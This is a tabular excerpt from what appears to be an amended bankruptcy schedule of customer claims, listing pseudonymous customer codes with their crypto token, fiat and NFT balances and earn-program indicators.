| 07403518 | | USD[0.78] | | |
| 07403520 | | BTC[.00000501], USD[0.00] | | |
| 07403522 | | BRZ[1], CUSDT[1], DOGE[321.91737364], SHIB[3], USD[0.01], USDT[0] | Yes | |
| 07403523 | | DOGE[0], NFT (520180606600984166/Whales Nation #7331)[1], NFT (526794841623340393/SOLYETIS #7111)[1], SOL[10.99999352], TRX[1979.44493473], USD[0.00], USDT[0.08847850] | | |
| 07403525 | | CUSDT[1], DOGE[55.26407133], LINK[.00023143], SUSHI[.09278554], TRX[60.54554826], UNI[.0031494], USD[0.52] | | |
| 07403527 | | DOGE[1], SHIB[4], USD[37.09] | | |
| 07403529 | | SOL[123.143], USD[0.01] | | |
| 07403530 | | BAT[4.14390616], BRZ[19.30772634], BTC[.00000009], CUSDT[155.55683077], DOGE[28.45186566], GRT[4.00002172], LINK[0], MATIC[.58279109], SHIB[24], SOL[0], TRX[59.73678484], USD[6.69], USDT[1.02543197] | Yes | |
| 07403538 | | SUSHI[.2425] | | |
| 07403540 | | BRZ[2], CUSDT[8], DOGE[6], ETH[.40395298], ETHW[.40378324], SHIB[7], SOL[23.24680206], TRX[8], UNI[11.62471617], USD[0.00] | Yes | |
| 07403550 | | USD[0.00] | Yes | |
| 07403552 | | DOGE[1], USD[0.00] | | |
| 07403553 | | BRZ[1], BTC[.0029255], CUSDT[1], DOGE[2], ETH[.07478365], ETHW[.07385361], SHIB[1], SOL[13.13299653], SUSHI[19.07747071], USD[430.36] | Yes | |
| 07403558 | | BTC[0], DOGE[0], TRX[144.19457472], USD[0.04] | | |
| 07403560 | | DOGE[1.62005176], USD[0.94] | | |
| 07403561 | | BRZ[1], CUSDT[4], DOGE[0], USD[0.00] | | |
| 07403563 | | CUSDT[12], DOGE[5.8007619], ETH[.01326473], ETHW[.01310057], SHIB[889992.49726077], USD[8.68] | Yes | |
| 07403567 | | BTC[.00176589], DOGE[2], TRX[1690.81945903], USD[0.00] | | |
| 07403568 | | BRZ[1], USD[0.00] | Yes | |
| 07403569 | | DOGE[1], SOL[.00002862], TRX[1], USD[0.03] | | |
| 07403570 | | USD[0.00] | Yes | |
| 07403571 | | BRZ[2], BTC[.00591323], SOL[5.66038043], TRX[2], USD[0.00] | | |
| 07403573 | | BTC[0], DOGE[0], LINK[0], SOL[1.28866933], TRX[0], USDT[0] | | |
| 07403575 | | USD[0.93], USDT[17] | | |
| 07403577 | | CUSDT[2], DOGE[1784.32323312], ETH[.00085837], ETHW[.00084478], SHIB[414136.68207583], TRX[418.84392602], USD[0.00] | Yes | |
| 07403578 | | BRZ[2], CUSDT[1], DOGE[1.01416204], GRT[.00858218], LINK[0.00017587], MATIC[0], SHIB[11], SUSHI[.00067623], TRX[3], USD[0.00], USDT[0.00003662] | Yes | |
| 07403583 | | BRZ[3], CUSDT[18], USD[0.01] | | |
| 07403586 | | AAVE[.0295449], ALGO[78.92133159], AVAX[.29635784], BTC[.0001], ETH[.00197525], LINK[.58949515], MATIC[7.93043586], NEAR[.59111173], SOL[.07825793], TRX[260.6557644], USD[1546.97] | Yes | |
| 07403588 | | BTC[.00042444], USD[0.00] | Yes | |
| 07403593 | | USD[0.00] | | |
| 07403603 | | BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], USD[837.48], USDT[0.00000067] | | |
| 07403608 | | SOL[1.11783629], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07403614 | | BAT[22.25912632], CUSDT[5], DOGE[2802.85336271], LTC[.20816878], TRX[497.13894537], USD[0.00] | | |
| 07403617 | | CUSDT[1], USD[0.00] | | |
| 07403624 | | SOL[70.72249533], TRX[1], USD[800.00] | | |
| 07403625 | | DOGE[.28573202], USD[0.00] | | |
| 07403634 | | BRZ[1], CUSDT[80.17553364], DOGE[8.29985865], ETH[.44371143], ETHW[.44352513], NFT (571713901050864815/Entrance Voucher #16046)[1], SHIB[23], SOL[52.55768142], SUSHI[37.15319292], TRX[5], USD[3.44] | Yes | |
| 07403640 | | AVAX[9.47042712], BAT[535.55052441], BRZ[81.01061577], BTC[.00766307], CUSDT[528.16927131], DOGE[1918.19782407], ETH[.26342509], ETHW[.26323277], GRT[322.75665326], LTC[.09069736], MATIC[429.68669806], SHIB[7760440.16531033], SOL[2.00368193], SUSHI[30.31798713], TRX[637.09111124], UNI[9.50884792], USD[0.04], USDT[.02466661] | Yes | |
| 07403642 | | BRZ[1], CUSDT[4], DOGE[.34856898], TRX[2], USD[0.01] | | |
| 07403650 | | TRX[1394.71290243], USD[0.00] | Yes | |
| 07403652 | | CUSDT[0], DOGE[1], ETH[0], TRX[2], USD[0.01] | Yes | |
| 07403654 | | BTC[.0001], SUSHI[199.81] | | |
| 07403657 | | BTC[0], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07403659 | | USD[249.09] | | |
| 07403664 | | BCH[0], BTC[0], CUSDT[1], DOGE[1], SOL[0], TRX[2], USDT[1] | | |
| 07403666 | | USD[0.00], USDT[0] | | |
| 07403670 | | DOGE[0], SUSHI[0], USD[0.01], USDT[0] | | |
| 07403675 | | DOGE[1], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07403678 | | AAVE[2.80392823], ALGO[265.03302951], AVAX[26.11982503], BAT[274.69466742], BRZ[5.04821262], CUSDT[2], DOGE[23.66534438], ETH[4.17249615], ETHW[7.17056698], GRT[294.79361731], LINK[213.15605202], LTC[13.42852417], MATIC[5097.75856098], NEAR[25.91469209], NFT (345684920994620350/Entrance Voucher #3466)[1], SHIB[14], SOL[0], SUSHI[324.62293191], TRX[11], USD[0.00], USDT[2.11462782] | Yes | |
| 07403686 | | DOGE[0], TRX[0], USD[0.00] | | |
| 07403695 | | USD[152.98] | | |
| 07403697 | | USD[0.01] | | |
| 07403698 | | SHIB[74], TRX[1], USD[190.31] | Yes | |
| 07403707 | | BRZ[1], CUSDT[2], USD[0.00] | Yes | |
| 07403714 | | AAVE[0], BTC[0], DOGE[0], ETH[0], GRT[0], LTC[0], MATIC[0], PAXG[.00000001], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07403719 | | USD[1.39] | | |
| 07403724 | | BRZ[1], CUSDT[7], DOGE[.57940467], TRX[1], USD[2.50], USDT[0] | | |
| 07403725 | | ETH[0], ETHW[0], USD[0.00], USDT[0.00000001] | | |
| 07403728 | | CUSDT[3], DOGE[51.1994768], TRX[1], USD[0.56] | | |
| 07403732 | | BTC[.00017907] | | |
| 07403736 | | NFT (482155459463806331/Scoogi #6333)[1], USD[273.00] | | |
| 07403737 | | BAT[3.26733271], BRZ[7.57857796], CUSDT[708.79421655], DOGE[1.02754611], GRT[7.41761656], KSHIB[5009.36797837], SHIB[115665747.98347609], TRX[1410.50026891], USD[0.00], USDT[0.33576253] | Yes | |
| 07403744 | | USD[0.01] | | |
| 07403746 | | SUSHI[0], USD[1.87] | | |
| 07403753 | | BRZ[4], BTC[0.00237427], CUSDT[9], DOGE[1], ETH[0.00577312], ETHW[0.00570471], SHIB[1], SOL[0.26171410], TRX[3], USD[0.00], USDT[1.09515354] | Yes | |
| 07403756 | | BCH[2.33179368], BRZ[10.45247274], BTC[.28498438], CUSDT[28], DOGE[2], ETH[2.60125943], ETHW[2.60024732], KSHIB[2662.38625953], LINK[42.61720045], LTC[5.35534264], MATIC[1285.68256129], SHIB[1], SOL[28.55667607], TRX[4], UNI[26.75672162], USD[15.19], USDT[1.04518881] | Yes | |
| 07403757 | | BTC[0], DOGE[.3489], LINK[.06685], MATIC[7.8378], SOL[0.00518880], SUSHI[.066505], USD[3.37], USDT[0.07470273], YFI[.00084762] | | |
| 07403760 | | BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[2], DOGE[214.29224870], ETH[0], GRT[0], LINK[0], LTC[0], SOL[2.64460962], SUSHI[0], TRX[1], UNI[0], USD[164.84], USDT[0], YFI[0] | | |
| 07403766 | | BAT[7.04206489], DOGE[4], ETH[.00441139], ETHW[.00441139], GRT[6.12883422], SOL[2.00582801], SUSHI[1.04744632], TRX[351.6400738], USD[0.00] | | |
| 07403768 | | DOGE[4], ETH[.00863056], ETHW[.00863056], SOL[1.03510438], TRX[2], USD[0.00] | | |
| 07403770 | | DOGE[1], USD[0.00] | | |
| 07403771 | | CUSDT[1], TRX[137.64927117], USD[0.00] | | |
| 07403777 | | BAT[0], BRZ[1], BTC[0], CUSDT[8], DOGE[0.82327769], ETH[0.00006167], ETHW[0.00006168], GRT[5.42811053], LINK[0.04142735], LTC[0], MATIC[0.40237245], SHIB[107211.29185491], SOL[0.00577805], TRX[0.65431227], UNI[0.01860761], USD[-0.98], USDT[0] | Yes | |
| 07403780 | | AAVE[.62937], AVAX[5.8], ETHW[1.189267], GRT[526.473], LINK[14.3856], SUSHI[44.4555], USD[0.00], YFI[.005994] | | |
| 07403782 | | BAT[0], DOGE[0], SHIB[0], SOL[0], TRX[0], USD[0.80] | Yes | |
| 07403784 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07403785 | | BAT[0], BTC[0], DOGE[0], GRT[0], SOL[0], TRX[0], USD[0.01] | | |
| 07403786 | | TRX[.000003] | | |
| 07403800 | | BRZ[1], DOGE[91228.67324498], USD[0.00] | | |
| 07403802 | | BF_POINT[300], BRZ[2], BTC[0.00000054], CUSDT[4], DOGE[1], GRT[171.77938575], LINK[.01138632], MATIC[.02265826], MKR[.00000043], NFT (290503615989690993/Coachella x FTX Weekend 1 #29731)[1], SOL[.00395382], TRX[7], UNI[.00005746], USD[0.01], USDT[0] | Yes | |
| 07403806 | | CUSDT[2], DOGE[0], USD[0.00] | | |
| 07403808 | | BAT[0], SOL[0], ETH[0], ETHW[0], GRT[0], LINK[0], SUSHI[0], USD[0.02] | | |
| 07403809 | | BCH[0.00841873], USD[1.25], USDT[.004511] | | |
| 07403811 | | USDT[0] | | |
| 07403814 | | LTC[.1299958] | | |
| 07403827 | | BRZ[64.16451839], BTC[.0001742], CUSDT[2], DOGE[136.12008858], TRX[163.62825362], UNI[.36271313], USD[0.00] | | |
| 07403833 | | USD[0.01], USDT[0] | | |
| 07403834 | | BTC[0], USD[6.95], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07403836 | | BRZ[1], CUSDT[3], TRX[2], USD[0.01] | | |
| 07403837 | | BRZ[1], CUSDT[3], TRX[2], USD[0.00] | | |
| 07403840 | | DOGE[1], USD[0.00] | | |
| 07403841 | | MATIC[0], USD[0.36] | Yes | |
| 07403843 | | CUSDT[4], DOGE[.00017942], ETH[.10708394], ETHW[.10708394], USD[0.00] | | |
| 07403844 | | AAVE[0], BAT[0.00027772], BCH[0], BTC[0.00000103], CUSDT[0], DOGE[0], ETH[0], GRT[0.00205451], KSHIB[2.99157591], LINK[0.00011093], LTC[0], MATIC[0.00526160], SHIB[296154.96358616], SOL[0.00045680], SUSHI[0.00508108], TRX[0], UNI[.00001247], USD[0.00], YFI[0.00000188] | Yes | |
| 07403847 | | BF_POINT[300], BRZ[1], CUSDT[7], DOGE[10.90091405], SOL[0.05238482], TRX[0], USD[0.00], USDT[0.00000004] | Yes | |
| 07403849 | | BAT[1], CUSDT[2], DOGE[0], GRT[3], TRX[4], USD[0.00], USDT[1] | | |
| 07403850 | | MATIC[3.75335437], SOL[.00137292], USD[0.00] | Yes | |
| 07403852 | | BRZ[3], CUSDT[10], DOGE[3], ETH[1.19315939], ETHW[1.19265831], GRT[1], MATIC[144.89104386], SHIB[1], SOL[53.74966030], SUSHI[75.87992155], TRX[7], UNI[29.53660172], USD[0.00] | Yes | |
| 07403867 | | BRZ[2], ETH[.00000001], SOL[935.35113118], USDT[1.06100686] | Yes | |
| 07403871 | | DOGE[1], USD[0.01] | | |
| 07403873 | | ETHW[.97], USD[0.03] | | |
| 07403877 | | BTC[.00023999], CUSDT[3], DOGE[1], GRT[5.79259146], TRX[84.73175582], USD[0.01] | | |
| 07403878 | | BAT[1], BRZ[6], CUSDT[27], GRT[3], SOL[0], TRX[26], UNI[1], USD[0.01], USDT[3] | | |
| 07403880 | | USD[0.00], USDT[0] | | |
| 07403891 | | BCH[.00000033], BTC[.00295656], CUSDT[15], DOGE[139.46036267], ETH[.00280639], ETHW[.00276535], GRT[1.0038277], LTC[.07055541], SHIB[178719.38215135], SUSHI[1.09271528], TRX[7.7782122], USD[1.79] | Yes | |
| 07403892 | | BAT[2.06980401], BRZ[2], CUSDT[1], DOGE[1757.08116215], ETH[6.6010315], ETHW[6.5989949], GRT[1.00242341], SOL[747.81824009], TRX[6], USD[14.49] | Yes | |
| 07403893 | | BRZ[1], CUSDT[6], DOGE[10045.88502123], TRX[7], USD[0.00], USDT[0] | Yes | |
| 07403898 | | BTC[1.3810494], DOGE[40.836], ETH[34.55679], ETHW[34.55679], USD[0.26] | | |
| 07403901 | | USD[0.00], USDT[0] | Yes | |
| 07403902 | | CUSDT[1], USD[0.00] | | |
| 07403906 | | ETH[0], USD[0.01] | | |
| 07403909 | | BCH[.11783375], CUSDT[5], DOGE[1], ETH[.12043573], ETHW[.12043573], LTC[2.86895464], SUSHI[34.40703764], UNI[0.53697928], USD[250.00] | | |
| 07403913 | | ETH[.1028254], ETHW[.1028254], LINK[.0588], SOL[.097], USD[10.08] | | |
| 07403917 | | BRZ[0], CUSDT[4], SOL[2.17069221], SUSHI[0], TRX[2670.94232804], USD[0.00] | Yes | |
| 07403919 | | DOGE[1], USD[0.00] | Yes | |
| 07403920 | | AVAX[0], BTC[0], DOGE[0], MATIC[0], NFT (31332643044062395/FTX - Off The Grid Miami #1520)[1], NFT (37348418924937895/BabyBlob #5)[1], NFT (39042389816851411/BabyBlob #90)[1], NFT (42938769335359582/Solamander #7991)[1], NFT (50107591321684935/Entrance Voucher #4069)[1], USD[0.00], USDT[0.00000001] | | |
| 07403922 | | SOL[1.98543213], TRX[1], USD[0.00] | Yes | |
| 07403926 | | BAT[1.01655549], BTC[.0009849], DOGE[2], ETH[.02538535], ETHW[.02507071], USD[0.00] | Yes | |
| 07403927 | | CUSDT[5], DOGE[18.22681714], LTC[.00018488], USD[0.00] | | |
| 07403929 | | BRZ[1], BTC[.02021009], DOGE[5], SHIB[5], TRX[2], USD[100.03], USDT[0.00002013] | Yes | |
| 07403936 | | BAT[.752], BCH[.000179], BTC[0.00000342], DOGE[.44], GRT[215.186], LINK[0.03570225], SOL[.0313], TRX[.772], UNI[.0716], USD[0.70], USDT[4.492145] | | |
| 07403945 | | USD[523.95] | Yes | |
| 07403959 | | USDT[2.96007220] | | |
| 07403961 | | BAT[1.01086602], BRZ[591.78425836], CUSDT[4], DOGE[573.10081256], GRT[199.55009265], SHIB[1], SOL[361.09302048], TRX[1], USD[0.00] | Yes | |
| 07403969 | | BTC[.00020175] | | |
| 07403985 | | USDT[1000] | | |
| 07403986 | | GRT[.00112305], KSHIB[1714.81965298], SHIB[5.65707244], USD[0.00], USDT[1.10236813] | Yes | |
| 07403991 | Contingent, Disputed | LTC[.00750291] | | |
| 07403993 | | BTC[0], USD[0.00], USDT[0.00009065] | | |
| 07403997 | | USDT[52.58] | | |
| 07403999 | | BTC[.0000011], DOGE[35.22303755], ETH[.00188245], ETHW[.00188245], USD[2.19] | | |
| 07404000 | | USD[0.00], USDT[0.00624200] | | |
| 07404003 | | BAT[1], CUSDT[2], DOGE[2], GRT[2], SOL[4.19029379], TRX[2], UNI[46.25641943], USD[0.01] | | |
| 07404004 | | CUSDT[1], USD[0.00] | | |
| 07404005 | | BAT[2.06726261], BRZ[4], BTC[0], CUSDT[3], DOGE[50076.99553745], ETH[1.50254114], ETHW[1.50190996], GRT[4.13524296], SHIB[28103845.28149018], TRX[6], USD[0.00], USDT[1.07644317] | Yes | |
| 07404026 | | BRZ[6.20563629], BTC[0], CUSDT[13], DOGE[0], ETH[0], GRT[1], SUSHI[1.10778348], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07404029 | | DOGE[1.0000334], TRX[1], USD[2.70] | | |
| 07404030 | | CUSDT[15], DOGE[3], GRT[1], NFT (420736914867100612/Degen Lady Ape #7)[1], SOL[7.07194752], TRX[97.74230888], YFI[.00141527] | | |
| 07404040 | | BRZ[1], CUSDT[1], SHIB[40.3753344], TRX[1], USD[0.00] | Yes | |
| 07404044 | | BAT[1], BRZ[3], CUSDT[6], DOGE[333.9311329], MATIC[.0229427], TRX[33.43350883], UNI[1.86434094], USD[0.00] | | |
| 07404050 | | BTC[0] | | |
| 07404055 | | USD[0.01] | Yes | |
| 07404072 | | USD[4.01] | | |
| 07404083 | | BTC[0], USD[0.15] | | |
| 07404091 | | BAT[0], BRZ[3], BTC[0], CUSDT[10], DAI[0], DOGE[0], ETH[.00000001], GRT[1], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[1] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07404093 | | BTC[0], CUSDT[1], USD[0.01], USDT[0] | Yes | |
| 07404095 | | CUSDT[2], DOGE[9999.72574983], USD[0.00] | Yes | |
| 07404100 | | DOGE[18], USD[0.00] | | |
| 07404102 | | DOGE[1022.42866589] | Yes | |
| 07404104 | | USD[0.00], USDT[0] | | |
| 07404108 | | CUSDT[1], USD[0.00] | | |
| 07404118 | | BAT[295.87187730], BRZ[3], BTC[.00000043], CUSDT[4], DOGE[17058.08562444], ETH[2.52877383], ETHW[2.52768866], SHIB[6494242.25514558], TRX[1808.95462010], USD[0.00], USDT[2.20863218] | Yes | |
| 07404123 | | USD[0.19] | | |
| 07404124 | | BAT[0], BCH[0], BF_POINT[300], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07404127 | | BRZ[2], CUSDT[4], DOGE[45190.65902298], TRX[1], USD[0.00], USDT[2.17190392] | Yes | |
| 07404129 | | AVAX[0], BRZ[5.03376635], BTC[0], CUSDT[10], DAI[0], MATIC[0], PAXG[0], SHIB[12], TRX[5], USD[0.00], USDT[0.00010207] | Yes | |
| 07404131 | | DOGE[1], SOL[63.16293551], USD[0.00] | Yes | |
| 07404135 | | CUSDT[2], LINK[388.88473363], USD[0.00], USDT[1.09857658] | Yes | |
| 07404137 | | CUSDT[1], DOGE[384.37512059], USD[0.00] | | |
| 07404143 | | BTC[0.00007537], DOGE[.476], ETH[0.00033431], ETHW[0.00043431], GRT[.308], TRX[.365], USD[0.00] | | |
| 07404146 | | DOGE[1], ETH[.04870918], ETHW[.04870918], USD[0.00] | | |
| 07404151 | | LINK[.041], USD[0.00], USDT[0] | | |
| 07404160 | | BTC[.00086651], DOGE[1], USD[0.00] | | |
| 07404162 | | BTC[0], DOGE[0], USD[0.00], USDT[0.00000054] | | |
| 07404173 | | USD[0.00] | | |
| 07404174 | | BRZ[2], BTC[.01126059], DOGE[0], LINK[2.12910985], USD[0.00] | Yes | |
| 07404179 | | GBP[0.99], TRX[.000301], USD[0.00] | | |
| 07404182 | | BTC[.00017736], ETH[.00243931], ETHW[.00243931], USD[10.00], YFI[.0001027] | | |
| 07404183 | | BRZ[1], DOGE[1], SOL[108.51381864], TRX[2], USD[0.00], USDT[1.08130138] | Yes | |
| 07404194 | | DOGE[1], SOL[0] | Yes | |
| 07404197 | | DOGE[0], TRX[2.72485914], USD[0.00] | | |
| 07404200 | | BTC[.003484], DOGE[1], USD[0.00] | | |
| 07404203 | | CUSDT[1], TRX[1], USD[0.00] | Yes | |
| 07404204 | | BCH[.145551], BTC[0.01259492], DOGE[979.02], ETH[.01969129], ETHW[.01969129], EUR[0.64], GBP[0.00], LTC[.1296], SOL[1.3986], USD[153.49] | | |
| 07404207 | | SOL[13.81708], USD[0.73] | | |
| 07404209 | | DOGE[3.984], LINK[2.993], SOL[35.3976], USD[65.46] | | |
| 07404215 | | BTC[0], ETH[.00097545], ETHW[.00097545], SUSHI[.212875] | | |
| 07404222 | | SOL[.06469064], USD[0.24] | Yes | |
| 07404231 | | BRZ[1], CUSDT[15], DOGE[0], ETH[0], SOL[0], TRX[2], USD[0.00] | | |
| 07404238 | | DOGE[1], TRX[1708.28241939], USD[0.00] | | |
| 07404242 | | BTC[0], DOGE[0], LINK[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07404243 | | BRZ[3], CUSDT[9], DOGE[272.16306112], ETH[.00002013], ETHW[2.20448658], MATIC[257.98601337], SHIB[10], SUSHI[22.40965285], TRX[9], USD[0.01], USDT[1.06621866] | Yes | |
| 07404244 | | GRT[0], USD[0.00] | | |
| 07404250 | | BAT[1.01243514], BRZ[1], BTC[.23756757], CUSDT[5], DOGE[55596.03392776], ETH[2.01366308], ETHW[2.01282577], TRX[5], USD[2.07], USDT[1.09142239] | Yes | |
| 07404254 | | USD[0.17], USDT[9.99989101] | | |
| 07404258 | | BRZ[131.79740318], DOGE[387.01264217], ETH[.03384785], KSHIB[1967.86331754], MATIC[13.76076515], SHIB[9], SOL[4.43114458], SUSHI[14.02413504], TRX[2], USD[0.00] | Yes | |
| 07404265 | | BRZ[1], BTC[.40335219], DOGE[.26417289], GRT[1], LINK[1.08343079], MATIC[1.00164518], TRX[2], USD[0.10], USDT[1.08340392] | Yes | |
| 07404266 | | BTC[.00000882], DOGE[1495.2962] | | |
| 07404269 | | USD[0.00] | | |
| 07404279 | | BAT[1.0165555], BRZ[2], CUSDT[5], TRX[2], USD[0.01] | Yes | |
| 07404283 | | BTC[0], SOL[.00956792], USD[0.00], USDT[0] | | |
| 07404286 | | BRZ[0], CUSDT[1.0481657], USD[0.00], USDT[0] | | |
| 07404292 | | BRZ[1], CUSDT[2], DOGE[86631.27066850], ETH[.83069881], ETHW[.83035002], TRX[2], USD[2.29] | Yes | |
| 07404300 | | AAVE[0], AVAX[0], BCH[0], BTC[0.00000002], CUSDT[0], DAI[0], DOGE[1], ETH[0], ETHW[0.00000026], GRT[0], LINK[0], MATIC[0.00028620], PAXG[0], SHIB[25], SOL[0.00000525], SUSHI[0], TRX[1], USD[0.68], USDT[0], YFI[0] | Yes | |
| 07404302 | | ETH[0.00487358], ETHW[0.00487357], SUSHI[.00000001], UNI[0], USD[-0.73] | | |
| 07404303 | | CUSDT[1], TRX[1], USD[0.00], USDT[1] | | |
| 07404308 | | BTC[.0010679] | | |
| 07404315 | | DOGE[1], GRT[1], SHIB[2], USD[0.00], USDT[1] | | |
| 07404316 | | BRZ[1], CUSDT[2], TRX[2], USD[0.00] | | |
| 07404318 | | TRX[0], USD[0.00], USDT[0.00000001] | | |
| 07404325 | | USD[0.09] | | |
| 07404333 | | DOGE[1], SHIB[1], USD[74.81] | Yes | |
| 07404346 | | BTC[0.00000001], LINK[0.87498447], NEAR[.00238521], USD[7.25], USDT[0.00000001] | | |

Amended Schedule A/B: nonpriority unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07404347 | | ETH[0], ETHW[0], USD[0.11], USDT[0.00000142] | | |
| 07404355 | | BTC[0], LTC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07404357 | | USD[0.14] | | |
| 07404360 | | USDT[25.11287051] | Yes | |
| 07404361 | | USD[0.00] | | |
| 07404364 | | DOGE[0], SOL[0], USD[0.00], USDT[0] | | |
| 07404365 | | USD[100.00] | | |
| 07404368 | | BRZ[1], SUSHI[1], USD[0.01] | | |
| 07404369 | | CAD[0.00], DOGE[93.70742734], GBP[0.00], NFT (404529614903845741/Only kid)[1], NFT (448351552232583400/Australia Ticket Stub #1090)[1], NFT (452799999352260236/BigDino6)[1], NFT (471271615008270708/Scene)[1], NFT (507288778992602838/Worthless Collection #7)[1], NFT (528298960571763263/Imola Ticket Stub #1001)[1], SHIB[326320.10951145], SOL[.20106389], USD[15.76], USDT[0] | Yes | |
| 07404387 | | USD[176.34] | | |
| 07404390 | | USD[0.00] | | |
| 07404392 | | BTC[0], USD[0.00] | | |
| 07404397 | | BTC[0], DOGE[0.00093096], ETH[0], SHIB[13], SOL[0], USD[0.00] | Yes | |
| 07404399 | | BTC[0], ETH[0], SOL[0], USD[3250.11], USDT[0] | | |
| 07404409 | | BAT[1.01655549], BRZ[4], CUSDT[6], GRT[1.00462408], TRX[5], USD[0.00] | Yes | |
| 07404411 | | BRZ[1], CUSDT[9], ETH[.00642391], ETHW[.00636823], SHIB[1], TRX[86.7033895], USD[0.00] | Yes | |
| 07404416 | | BAT[305.95604941], BRZ[2], BTC[.00068837], CUSDT[8], DOGE[4160.15528284], ETH[.02415819], ETHW[.02385723], GRT[112.46251505], SHIB[3971565.34616436], SOL[2.23752175], TRX[2668.34742277], USDX[718.16] | Yes | |
| 07404420 | | SOL[101.48895892], TRX[1], USD[0.00] | | |
| 07404427 | | BRZ[1], GRT[1], USD[0.01] | | |
| 07404428 | | BAT[26.31833127], BRZ[27.12291606], BTC[.00098319], CUSDT[1184.4520884], DOGE[510.64192682], GRT[45.50610268], TRX[685.14702277], USD[0.00], USDT[0] | | |
| 07404430 | | BRZ[3], CUSDT[7], DOGE[4555.92601599], ETH[.3042954], ETHW[.30410914], LTC[.07288994], SOL[.88876496], SUSHI[3.18164631], TRX[9341.47911506], USD[0.00], USDT[1.08543555] | Yes | |
| 07404431 | | BTC[.0310624], DOGE[1], SHIB[2], TRX[2], USD[0.31] | Yes | |
| 07404434 | | CUSDT[3], DOGE[1054.19775236], TRX[3], USD[0.00] | | |
| 07404436 | | BTC[0], GRT[0], TRX[0], USD[0.06] | | |
| 07404437 | | BTC[0.00001670], SOL[.00069], USD[0.00], USDT[.7985808] | | |
| 07404440 | | BAT[1], CUSDT[2], TRX[40.29024915], USD[0.56] | | |
| 07404443 | | BTC[0], DOGE[1.00095590], GRT[0], SOL[0], TRX[0], UNI[0], USD[0.01] | | |
| 07404448 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07404449 | | BTC[.0000056], CUSDT[5], DOGE[.09109987], LINK[.00002152], SUSHI[.00448683], TRX[2], UNI[.00568814], USD[0.01] | | |
| 07404450 | | USD[25.00] | | |
| 07404460 | | BRZ[1], CUSDT[5], USD[0.00] | | |
| 07404462 | | BTC[.02163313], DOGE[1907.73325994], LINK[20.93532621], MATIC[219.791], SUSHI[17.93160000], USD[0.00] | | |
| 07404470 | | DOGE[0], ETH[0], ETHW[5.20247186], NFT (570547855252829151/Entrance Voucher #29334)[1], SOL[0], SUSHI[0], USD[1.49], USDT[0] | Yes | |
| 07404471 | | USD[0.01] | | |
| 07404473 | | NFT (402583149991707443/The 2974 Collection #0136)[1], NFT (419197338595203257/Birthday Cake #0136)[1], TRX[32229.997001], USD[32.50] | | |
| 07404484 | | USD[0.00], USDT[.5121] | | |
| 07404485 | | ETH[0], ETHW[0], SOL[0], USD[0.00], USDT[1.06673420] | | |
| 07404487 | | DOGE[1], ETH[0] | | |
| 07404491 | | DOGE[544.53538125], SHIB[2], TRX[228.71063926], USD[0.00] | Yes | |
| 07404492 | | UNI[164.3355], USD[129.98] | | |
| 07404493 | | BTC[0], ETH[0], ETHW[0], SHIB[143706163.17251831], USD[0.00] | | |
| 07404494 | | DOGE[0], GRT[0], USD[0.00] | | |
| 07404496 | | CUSDT[1], DOGE[360.14944257], USD[0.00] | | |
| 07404499 | | ETH[.09984674], ETHW[.09984674] | | |
| 07404500 | | USD[0.50], USDT[0] | | |
| 07404505 | | DOGE[1], ETH[.01237568], ETHW[.01237568], USD[0.00] | | |
| 07404506 | | BTC[0], CUSDT[3], DOGE[579.07418841], ETH[.01375082], ETHW[.01375082], TRX[.00003029], USD[0.00] | | |
| 07404508 | | NFT (330510411455717996/Entrance Voucher #2179)[1], USD[0.39] | | |
| 07404509 | | USD[0.00] | | |
| 07404513 | | BRZ[1], CUSDT[2], DOGE[4.04455669], ETH[.29371596], ETHW[.293523], LINK[40.86789752], TRX[1], USD[0.01] | Yes | |
| 07404514 | | ETH[0], TRX[1] | | |
| 07404519 | | DOGE[.00701314], SHIB[1], USD[0.01] | Yes | |
| 07404520 | | BAT[1], DOGE[1], USD[0.00] | | |
| 07404522 | | CUSDT[0], DOGE[0], USD[1589.57], USDT[0] | Yes | |
| 07404523 | | DOGE[1], USD[0.00] | | |
| 07404524 | | SOL[1.05], USD[3.27], USDT[.6253465] | | |
| 07404525 | | USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07404529 | | ETH[.08], ETHW[.08], USD[200.00] | | |
| 07404532 | | ETH[.19895], ETHW[.19895] | | |
| 07404539 | | DOGE[447.36488158], TRX[1], USD[0.00] | Yes | |
| 07404541 | | USDT[2.2355] | | |
| 07404543 | | USD[0.47] | | |
| 07404552 | | BRZ[2], CUSDT[4], DAI[69.65027967], DOGE[7], SHIB[1], TRX[2.000007], UNI[1], USD[0.00], USDT[0.00000001] | | |
| 07404553 | | CUSDT[2], DOGE[448.49693039], TRX[1518.19618859], USD[0.00] | | |
| 07404556 | | ETH[0] | | |
| 07404558 | | USD[0.00], USDT[0] | | |
| 07404559 | | TRX[.000011], USD[0.07], USDT[.16557] | | |
